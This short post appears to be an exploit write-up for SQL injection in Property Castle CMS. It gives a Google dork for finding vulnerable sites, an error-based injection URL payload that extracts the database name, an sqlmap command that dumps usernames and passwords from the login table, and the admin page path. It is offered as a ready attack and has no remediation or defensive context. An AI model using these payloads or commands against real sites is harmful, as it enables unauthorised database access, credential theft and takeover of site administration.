Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php
Post a Comment